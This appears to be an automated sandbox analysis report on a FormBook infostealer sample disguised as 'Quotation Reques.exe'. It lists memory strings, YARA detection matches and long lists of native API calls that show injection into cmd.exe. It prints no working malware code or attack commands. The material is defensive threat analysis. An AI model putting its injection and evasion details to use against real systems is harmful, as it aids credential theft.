          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: Quotation Reques.exe, LogIn.csLong String: Length: 13656
          Source: ftkqUsB.exe.0.dr, LogIn.csLong String: Length: 13656
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.csLong String: Length: 13656
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.csLong String: Length: 13656
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Quotation Reques.exe
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181CA NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004182FA NtClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183AC NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041842A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003884BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003858A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4F8 NtQueryInformationToken,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4C0 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A9AB4 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003883F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A1C2B0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A19990
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B30040
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EB8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EA7
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C68
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C58
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B30D88
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B3FA20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B862
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041C864
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004012FB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041BB26
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C6B
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C70
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CC1E
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CE55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CFEB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117F900
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242D07
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01170D20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241D55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118D5E0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012425DD
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118841F
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231002
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123D466
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B090
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012420A8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012428EC
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242B28
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AEBB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241FF1
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123DBD2
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01196E30
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012422AE
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00389CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003848E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00391969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00387190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00385226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00385E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00388AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038CB48
